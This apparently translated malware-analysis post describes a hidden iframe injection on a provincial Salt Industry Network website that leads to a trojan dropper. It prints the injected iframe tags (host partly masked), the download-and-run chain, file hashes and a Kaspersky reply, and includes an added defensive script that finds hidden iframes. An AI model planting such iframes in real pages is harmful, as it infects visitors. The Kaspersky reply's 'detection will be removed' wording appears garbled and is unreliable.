Code for Trojan.DL.Win32.Agent.zrc was implanted in a provincial Salt Industry Network website.
Endurer original
Version 1
The following code was added at the top and bottom of the website's home page:
/---
<IFRAME src = hxxp: // H * ot ** peak. Host **. 2 * w ** cn.com/wm/index.htm width = 0 Height = 0> </iframe>
---/
hxxp: // H * ot ** peak. Host **. 2 * w ** cn.com/wm/index.htm checks the cookie variable heiyeno2. If the cookie does not exist, the page creates it and outputs the following code:
/---
<IFRAME width = 0 Height = 0 src?tcsafe.htm> </iframe>
<IFRAME src = hxxp: // H * ot ** peak. Host **. 2 * w ** cn.com/wm/tcsafe.htm width = 0 Height = 0> </iframe>
---/
tcsafe.htm downloads xxz.exe, saves it as tcsafe.com, and runs it.
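A defender-side check for the injection pattern described above, as an added example that is not part of the original post: it parses a page and reports iframes with zero width or height (or hidden through an inline style), marking those whose src points to another host. The sample HTML, the host names and the names HiddenIframeFinder and find_hidden_iframes are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attribute value that renders as zero size: "0", "0px", "0%".
ZERO = re.compile(r"^\s*0+(px|%)?\s*$", re.I)
# Inline styles that make the frame invisible.
STYLE_HIDE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(width|height)\s*:\s*0+(px)?\s*(;|$)",
    re.I)

class HiddenIframeFinder(HTMLParser):
    """Collect iframes that occupy no visible area on the page."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # HTMLParser lowercases tag names
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        hidden = (ZERO.match(a.get("width", "x")) or ZERO.match(a.get("height", "x"))
                  or STYLE_HIDE.search(a.get("style", "")))
        if not hidden:
            return
        src = a.get("src", "").strip()
        host = (urlparse(src).hostname or "").lower()
        # A relative src has no host; it is still reported, but not as off-site.
        off_site = bool(host) and host != self.site_host
        self.findings.append({"line": self.getpos()[0], "src": src, "off_site": off_site})

def find_hidden_iframes(html, site_host):
    """Return one finding per hidden iframe in the given HTML text."""
    parser = HiddenIframeFinder(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page; hosts use the reserved .invalid TLD.
SAMPLE = """<html><body>
<iframe src="http://injected.example.invalid/wm/index.htm" width=0 height=0></iframe>
<h1>Home</h1>
<iframe src="/widgets/news.html" width="300" height="200"></iframe>
<iframe width=0 height=0 src=tcsafe.htm></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE, "www.site.example.invalid"):
        print(f)
```

Run against saved copies of a site's pages, a hidden off-site finding on a page whose templates contain no such frame is a sign that the page has been modified.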
File Description: D:/test/xxz.exe
Attribute: ---
Language: Chinese (China)
File version: 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
Description: Win32 cabinet self-Extractor
Copyright: (c) Microsoft Corporation. All rights reserved.
Note:
Product Version: 6.00.2900.2180
Product Name: Microsoft (r) Windows (r) Operating System
Company Name: Microsoft Corporation
Legal trademark:
Internal name: wextract
Source File Name: wextract.exe
Creation Time: 12:17:32
Modification time: 12:17:36
Access time: 12:22:53
Size: 386560 bytes, 377.512 KB
MD5: 452ec2b7ec2f9823a42474e90c55319d
SHA1: 87aba7445fed3cd5ce2a4df7cc705902a50b3a8a
CRC32: 07ca93ce
Rising reports: Trojan.DL.Win32.Agent.zrc > Aspr.ske.2.x.New > 3.exe >> pe_patch(14) > pe_patch(14)
Subject: Re: xxz.exe [KLAB-3175811]
Sender: "" <Newvirus@kaspersky.com>
Sent at: 13:31:08
Hello.
Trojan-Dropper.Win32.Agent.ceb
New malicious software was found in the attached file.
Its detection will be removed in the next update. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus analyst, Kaspersky Lab.